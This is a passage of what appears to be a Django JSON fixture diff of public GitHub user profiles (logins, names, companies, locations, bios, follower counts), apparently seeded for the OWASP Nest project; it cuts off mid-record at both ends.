"https://avatars.githubusercontent.com/u/15940596?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 633, + "followers_count": 93, + "public_gists_count": 4, + "public_repositories_count": 196, + "created_at": "2015-11-20T10:06:53Z", + "updated_at": "2023-11-25T06:57:53Z", + "node_id": "MDQ6VXNlcjE1OTQwNTk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3220, + "fields": { + "nest_created_at": "2024-09-13T05:15:46.065Z", + "nest_updated_at": "2024-09-22T19:21:28.446Z", + "name": "", + "login": "phmazzoni", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15751026?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-11-09T22:52:16Z", + "updated_at": "2023-08-29T23:32:40Z", + "node_id": "MDQ6VXNlcjE1NzUxMDI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3221, + "fields": { + "nest_created_at": "2024-09-13T05:15:48.052Z", + "nest_updated_at": "2024-09-13T05:15:48.052Z", + "name": "", + "login": "tuannonh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65121914?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-05-10T14:24:31Z", + "updated_at": "2023-06-13T08:30:51Z", + "node_id": "MDQ6VXNlcjY1MTIxOTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3222, + "fields": { + "nest_created_at": "2024-09-13T05:16:49.200Z", + "nest_updated_at": "2024-09-20T17:51:51.834Z", + "name": "Trace Meyers", + "login": "k17trmeye", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92347115?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-10-12T02:01:55Z", + "updated_at": "2024-05-02T16:11:28Z", + "node_id": "U_kgDOBYEa6w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3223, + "fields": { + "nest_created_at": "2024-09-13T05:17:10.871Z", + "nest_updated_at": "2024-09-13T05:17:10.871Z", + "name": "Hugh Greene", + "login": "HughG", + "email": "githugh@tameter.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1408302?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2012-02-04T16:29:19Z", + "updated_at": "2024-08-28T10:20:07Z", + "node_id": "MDQ6VXNlcjE0MDgzMDI=", + "bio": "Senior software developer with interests in many things, including software and documentation tools.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3224, + "fields": { + "nest_created_at": "2024-09-13T05:17:12.980Z", + "nest_updated_at": "2024-09-13T05:17:12.980Z", + "name": "Wesley Hartford", + "login": "wfhartford", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/717585?v=4", + "company": "", + "location": "Vancouver BC", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 3, + "public_gists_count": 6, + "public_repositories_count": 73, + "created_at": "2011-04-08T14:27:42Z", + "updated_at": "2024-08-09T16:24:34Z", + "node_id": "MDQ6VXNlcjcxNzU4NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3225, + "fields": { + "nest_created_at": "2024-09-13T05:17:15.320Z", + "nest_updated_at": "2024-09-14T19:26:45.818Z", + "name": "Joel Shaffer", + "login": "jrshaffe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/98034646?v=4", + "company": "VMware", + "location": "Detroit", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 22, + "created_at": "2022-01-19T14:13:17Z", + "updated_at": "2024-08-16T15:23:52Z", + "node_id": "U_kgDOBdfj1g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3226, + "fields": { + "nest_created_at": "2024-09-13T05:17:54.825Z", + "nest_updated_at": "2024-09-22T18:46:50.041Z", + "name": "", + "login": "marihstr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77149911?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-01-08T10:20:32Z", + "updated_at": "2024-07-30T07:03:20Z", + "node_id": "MDQ6VXNlcjc3MTQ5OTEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3227, + "fields": { + "nest_created_at": "2024-09-13T05:18:18.230Z", + "nest_updated_at": "2024-09-22T18:47:30.812Z", + "name": "Stefan Arzbach", + "login": "Lasitrox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60935446?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-02-11T16:28:22Z", + "updated_at": "2024-06-18T14:07:07Z", + "node_id": "MDQ6VXNlcjYwOTM1NDQ2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3228, + "fields": { + "nest_created_at": "2024-09-13T05:18:46.722Z", + "nest_updated_at": "2024-09-13T05:18:46.722Z", + "name": "", + "login": "mallikharjuna-K", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/178186641?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-08-12T15:09:10Z", + "updated_at": "2024-08-12T16:48:33Z", + "node_id": "U_kgDOCp7pkQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3229, + "fields": { + "nest_created_at": "2024-09-13T05:18:47.371Z", + "nest_updated_at": "2024-09-20T17:53:41.493Z", + "name": "", + "login": "FarooqAftab", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161705457?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-02-29T09:40:43Z", + "updated_at": "2024-09-10T09:18:12Z", + "node_id": "U_kgDOCaNt8Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3230, + "fields": { + "nest_created_at": "2024-09-13T05:19:52.410Z", + "nest_updated_at": "2024-09-22T18:52:33.813Z", + "name": "CireSnave", + "login": "ciresnave", + "email": "ciresnave@yahoo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19400463?v=4", + "company": "Evans Laboratories Incorporated", + "location": "Arizona, USA, Earth", + "collaborators_count": 0, + "following_count": 60, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2016-05-17T03:11:51Z", + "updated_at": "2024-09-20T00:45:26Z", + "node_id": "MDQ6VXNlcjE5NDAwNDYz", + "bio": "", + "is_hireable": true, + "twitter_username": "CireSnave" + } +}, +{ + "model": "github.user", + "pk": 3231, + "fields": { + "nest_created_at": "2024-09-13T05:21:51.284Z", + "nest_updated_at": "2024-09-22T18:41:51.753Z", + "name": "JulienB", + "login": "burn1ngd0g", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/157806538?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-01-26T12:17:59Z", + "updated_at": "2024-06-12T06:59:08Z", + "node_id": "U_kgDOCWfvyg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3232, + "fields": { + "nest_created_at": "2024-09-13T05:22:02.013Z", + "nest_updated_at": "2024-09-22T18:41:15.989Z", + "name": "Adam Pietrzycki", + "login": "adampie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1269580?v=4", + "company": "@zapier ", + "location": "London", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-12-17T13:09:16Z", + "updated_at": "2024-08-26T21:58:12Z", + "node_id": "MDQ6VXNlcjEyNjk1ODA=", + "bio": "Cloud Security at @zapier", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3233, + "fields": { + "nest_created_at": "2024-09-13T05:22:02.702Z", + "nest_updated_at": "2024-09-22T18:41:25.625Z", + "name": "nitrocode", + "login": "nitrocode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7775707?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 93, + "followers_count": 100, + "public_gists_count": 77, + "public_repositories_count": 195, + "created_at": "2014-06-03T02:30:33Z", + "updated_at": "2024-09-06T03:35:10Z", + "node_id": "MDQ6VXNlcjc3NzU3MDc=", + "bio": "contact: https://bit.ly/2K7e76D | \r\nkeybase: https://bit.ly/39lPFad | \r\ncalendly: https://bit.ly/3x1jWaG", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3234, + "fields": { + "nest_created_at": "2024-09-13T05:22:03.380Z", + "nest_updated_at": "2024-09-22T18:41:16.307Z", + "name": "Nir Mesika", + "login": "nirmesika", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81566980?v=4", + "company": "Unity", + "location": "Tel-Aviv", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-03-29T12:03:46Z", + "updated_at": "2024-08-08T17:35:44Z", + "node_id": "MDQ6VXNlcjgxNTY2OTgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3235, + "fields": { + "nest_created_at": "2024-09-13T05:22:21.855Z", + "nest_updated_at": "2024-09-22T18:41:07.263Z", + "name": "", + "login": "Arszilla", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22989170?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 51, + "followers_count": 59, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2016-10-21T22:08:14Z", + "updated_at": "2024-09-16T20:40:23Z", + "node_id": "MDQ6VXNlcjIyOTg5MTcw", + "bio": "CISSP, CRTO, GWAPT, OSCP", + "is_hireable": true, + "twitter_username": "Arszilla" + } +}, +{ + "model": "github.user", + "pk": 3236, + "fields": { + "nest_created_at": "2024-09-13T05:22:32.574Z", + "nest_updated_at": "2024-09-20T17:49:23.061Z", + "name": "Martin Seckar", + "login": "mseckar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60925529?v=4", + "company": "Red Hat", + "location": "Brno, Czech Republic", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-02-11T12:15:03Z", + "updated_at": "2024-09-09T13:04:13Z", + "node_id": "MDQ6VXNlcjYwOTI1NTI5", + "bio": "PM and InfoSec Analyst.\r\nMy old profile: @xsecka04", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3237, + "fields": { + "nest_created_at": "2024-09-13T16:17:29.285Z", + "nest_updated_at": "2024-09-22T18:29:13.820Z", + "name": "Ryan Armstrong", + "login": "ryarmst", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19736727?v=4", + "company": "@DigitalBoundaryGroup", + "location": "London, Ontario, Canada", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2016-06-03T19:45:35Z", + "updated_at": "2024-09-17T21:33:28Z", + "node_id": "MDQ6VXNlcjE5NzM2NzI3", + "bio": "Application security practitioner and trainer. PhD in biomedical engineering. Before infosec, graphics, game engines, surgical sim, and medical imaging.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3238, + "fields": { + "nest_created_at": "2024-09-13T16:27:28.159Z", + "nest_updated_at": "2024-09-14T18:51:00.641Z", + "name": "Shaheem", + "login": "FireCodeStudioHub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/159974503?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2024-02-14T02:02:09Z", + "updated_at": "2024-09-13T04:26:34Z", + "node_id": "U_kgDOCYkEZw", + "bio": "Security Researcher", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3239, + "fields": { + "nest_created_at": "2024-09-13T16:27:45.954Z", + "nest_updated_at": "2024-09-22T19:49:05.959Z", + "name": "Xhoenix", + "login": "Xhoenix", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86168235?v=4", + "company": "", + "location": "~/", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2021-06-19T19:33:39Z", + "updated_at": "2024-09-16T02:29:33Z", + "node_id": "MDQ6VXNlcjg2MTY4MjM1", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3240, + "fields": { + "nest_created_at": "2024-09-13T16:54:46.463Z", + "nest_updated_at": "2024-09-14T19:18:06.378Z", + "name": "", + "login": "buke-narlitepe-itk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/134285237?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-05-22T11:27:09Z", + "updated_at": "2024-09-13T11:57:24Z", + "node_id": "U_kgDOCAEHtQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3241, + "fields": { + "nest_created_at": "2024-09-13T17:09:37.700Z", + "nest_updated_at": "2024-09-22T18:39:54.951Z", + "name": "Animesh Raj", + "login": "itsarraj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/151125034?v=4", + "company": "", + "location": "Distributed", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2023-11-17T06:59:48Z", + "updated_at": "2024-09-18T02:43:30Z", + "node_id": "U_kgDOCQH8Kg", + "bio": "Hi, I'm Animesh Raj, a passionate Full-Stack Developer specializing in JavaScript and TypeScript.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3242, + "fields": { + "nest_created_at": "2024-09-13T17:09:59.645Z", + "nest_updated_at": "2024-09-16T21:14:05.545Z", + "name": "Xin Zhang", + "login": "xzhang-ipipeline", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/128854385?v=4", + "company": "iPipeline Canada", + "location": "Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-03-24T20:46:46Z", + "updated_at": "2024-05-13T14:10:18Z", + "node_id": "U_kgDOB64pcQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3243, + "fields": { + "nest_created_at": "2024-09-16T21:08:08.926Z", + "nest_updated_at": "2024-09-22T06:46:26.049Z", + "name": "", + "login": "sumetpong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69327686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-08-06T22:16:20Z", + "updated_at": "2024-09-16T15:11:55Z", + "node_id": "MDQ6VXNlcjY5MzI3Njg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3244, + "fields": { + "nest_created_at": "2024-09-16T21:14:06.551Z", + "nest_updated_at": "2024-09-20T17:48:26.890Z", + "name": "", + "login": "stevenkain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29120732?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-06-01T11:00:48Z", + "updated_at": "2024-09-15T07:17:23Z", + "node_id": "MDQ6VXNlcjI5MTIwNzMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3245, + "fields": { + "nest_created_at": "2024-09-16T22:19:42.422Z", + "nest_updated_at": "2024-09-20T17:53:49.821Z", + "name": "", + "login": "lucamrgs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39555424?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-05-23T10:47:15Z", + "updated_at": "2024-09-17T16:28:11Z", + "node_id": "MDQ6VXNlcjM5NTU1NDI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3246, + "fields": { + "nest_created_at": "2024-09-16T22:25:15.589Z", + "nest_updated_at": "2024-09-19T07:31:48.991Z", + "name": "", + "login": "JoeNuttall", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109506359?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-07-18T07:04:21Z", + "updated_at": "2024-09-16T06:48:42Z", + "node_id": "U_kgDOBobvNw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3247, + "fields": { + "nest_created_at": "2024-09-16T22:29:10.357Z", + "nest_updated_at": "2024-09-16T22:29:10.357Z", + "name": "Thomas Calderon", + "login": "calderonth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/766422?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2011-05-03T20:02:19Z", + "updated_at": "2024-09-04T08:16:04Z", + "node_id": "MDQ6VXNlcjc2NjQyMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3248, + "fields": { + "nest_created_at": "2024-09-16T22:32:52.148Z", + "nest_updated_at": "2024-09-18T00:21:50.188Z", + "name": "Mahdi Moradi", + "login": "mmoradi-87", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11390495?v=4", + "company": "", + "location": "Tehran", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-03-09T13:24:45Z", + "updated_at": "2024-09-16T14:46:08Z", + "node_id": "MDQ6VXNlcjExMzkwNDk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3249, + "fields": { + "nest_created_at": "2024-09-17T17:17:13.372Z", + "nest_updated_at": "2024-09-21T06:31:30.890Z", + "name": "Meghan Jacquot", + "login": "meghanjacquot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65329458?v=4", + "company": "", + "location": "East Coast, United States of America", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2020-05-14T05:32:02Z", + "updated_at": "2024-08-30T02:42:47Z", + "node_id": "MDQ6VXNlcjY1MzI5NDU4", + "bio": "Curious & creative: A security engineer - I love debugging code as I problem solve. I'm passionate about fairness in ML. These are past projects.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3250, + "fields": { + "nest_created_at": "2024-09-18T00:15:09.066Z", + "nest_updated_at": "2024-09-19T07:31:51.644Z", + "name": "", + "login": "AndreasIgelCC", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2921976?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2012-11-29T14:01:33Z", + "updated_at": "2024-01-11T10:44:26Z", + "node_id": "MDQ6VXNlcjI5MjE5NzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3251, + "fields": { + "nest_created_at": "2024-09-18T00:18:19.676Z", + "nest_updated_at": "2024-09-21T07:17:19.529Z", + "name": "Vladimir Terzic", + "login": "algol68", + "email": "vlad@terzic.net", + "avatar_url": "https://avatars.githubusercontent.com/u/171199?v=4", + "company": "", + "location": "Boise, Idaho USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2009-12-23T01:07:39Z", + "updated_at": "2024-09-17T20:00:44Z", + "node_id": "MDQ6VXNlcjE3MTE5OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3252, + "fields": { + "nest_created_at": "2024-09-18T00:19:29.167Z", + "nest_updated_at": "2024-09-22T19:43:13.783Z", + "name": "Eric Nieuwland", + "login": "eric-nieuwland", + "email": "eric.nieuwland@ictu.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/10603975?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-01-19T20:54:32Z", + "updated_at": "2024-08-12T11:53:05Z", + "node_id": "MDQ6VXNlcjEwNjAzOTc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3253, + "fields": { + "nest_created_at": "2024-09-18T17:40:07.424Z", + "nest_updated_at": "2024-09-22T03:45:22.250Z", + "name": "Filippos Fotopoulos", + "login": "filipposfwt", + "email": "filfwt@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16762331?v=4", + "company": "", + "location": "Athens, Greece", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-01-18T16:14:41Z", + "updated_at": "2024-09-18T09:41:16Z", + "node_id": "MDQ6VXNlcjE2NzYyMzMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3254, + "fields": { + "nest_created_at": "2024-09-18T18:14:57.709Z", + "nest_updated_at": "2024-09-22T19:49:21.831Z", + "name": "", + "login": "c0nd3v", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32241825?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2017-09-24T13:54:02Z", + "updated_at": "2024-09-20T05:29:21Z", + "node_id": "MDQ6VXNlcjMyMjQxODI1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3255, + "fields": { + "nest_created_at": "2024-09-18T18:56:38.193Z", + "nest_updated_at": "2024-09-22T18:45:48.568Z", + "name": "", + "login": "MarioAllegro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39234782?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-05-13T08:49:01Z", + "updated_at": "2024-09-19T05:57:48Z", + "node_id": "MDQ6VXNlcjM5MjM0Nzgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3256, + "fields": { + "nest_created_at": "2024-09-18T18:58:00.059Z", + "nest_updated_at": "2024-09-22T18:48:05.173Z", + "name": "Josh Jennings", + "login": "SOOS-JJennings", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88005582?v=4", + "company": "SOOS", + "location": "Winooski, VT", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-07-26T21:11:41Z", + "updated_at": "2024-07-22T13:55:21Z", + "node_id": "MDQ6VXNlcjg4MDA1NTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3257, + "fields": { + "nest_created_at": "2024-09-18T19:03:22.852Z", + "nest_updated_at": "2024-09-22T19:26:28.986Z", + "name": "Simon Sperling", + "login": "Reduxx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1726223?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2012-05-10T11:06:09Z", + "updated_at": "2024-05-14T10:21:18Z", + "node_id": "MDQ6VXNlcjE3MjYyMjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3258, + "fields": { + "nest_created_at": "2024-09-18T19:07:03.282Z", + "nest_updated_at": "2024-09-22T18:44:23.488Z", + "name": "Maureen", + "login": "maur1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5443905?v=4", + "company": "Boitano", + "location": "Oslo", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2013-09-12T12:19:33Z", + "updated_at": "2024-08-22T11:31:32Z", + "node_id": "MDQ6VXNlcjU0NDM5MDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3259, + "fields": { + "nest_created_at": "2024-09-19T07:31:54.641Z", + "nest_updated_at": "2024-09-20T18:23:55.455Z", + "name": "AMMAR AZIZ", + "login": "ammaraziz493", + "email": "ammaraziz493@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/135884781?v=4", + "company": "Autosphere", + "location": "Earth", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2023-06-07T19:42:12Z", + "updated_at": "2024-09-20T12:37:40Z", + "node_id": "U_kgDOCBlv7Q", + "bio": "Backend developer specializing in Java, Spring Boot, and Jenkins, focused on building scalable applications and enhancing development workflows.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3260, + "fields": { + "nest_created_at": "2024-09-19T07:34:59.186Z", + "nest_updated_at": "2024-09-20T18:27:04.436Z", + "name": "", + "login": "andrewjmaguire", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17755359?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-03-10T02:19:24Z", + "updated_at": "2023-12-15T00:54:14Z", + "node_id": "MDQ6VXNlcjE3NzU1MzU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3261, + "fields": { + "nest_created_at": "2024-09-19T07:35:33.848Z", + "nest_updated_at": "2024-09-22T19:41:33.282Z", + "name": "Felipe Rios", + "login": "rios0rios0", + "email": "rios0rios0@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32651906?v=4", + "company": "@CalianGroup", + "location": "Canada", + "collaborators_count": 0, + "following_count": 40, + "followers_count": 50, + "public_gists_count": 7, + "public_repositories_count": 57, + "created_at": "2017-10-09T19:36:26Z", + "updated_at": "2024-09-19T14:25:37Z", + "node_id": "MDQ6VXNlcjMyNjUxOTA2", + "bio": "Computer engineer with 10 years of experience. Interested in areas related to: software engineering, performance challenges and information security.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3262, + "fields": { + "nest_created_at": "2024-09-19T07:40:32.825Z", + "nest_updated_at": "2024-09-22T20:29:20.073Z", + "name": "Oli", + "login": "Huppys", + "email": "projects@oliverwitzki.de", + "avatar_url": "https://avatars.githubusercontent.com/u/7705640?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-05-26T20:18:19Z", + "updated_at": "2024-09-11T20:03:01Z", + "node_id": "MDQ6VXNlcjc3MDU2NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3263, + "fields": { + "nest_created_at": "2024-09-20T17:34:22.043Z", + "nest_updated_at": "2024-09-20T17:34:22.043Z", + "name": "runner12434", + "login": "runner12434", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/132839396?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-05-07T16:34:41Z", + "updated_at": "2024-09-18T15:53:24Z", + "node_id": "U_kgDOB-r35A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3264, + "fields": { + "nest_created_at": "2024-09-20T17:41:00.759Z", + "nest_updated_at": "2024-09-22T20:25:21.807Z", + "name": "Sandro Gauci", + "login": "sandrogauci", + "email": "sandro@enablesecurity.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1313984?v=4", + "company": "EnableSecurity", + "location": "Bavaria, Germany", + "collaborators_count": 0, + "following_count": 81, + "followers_count": 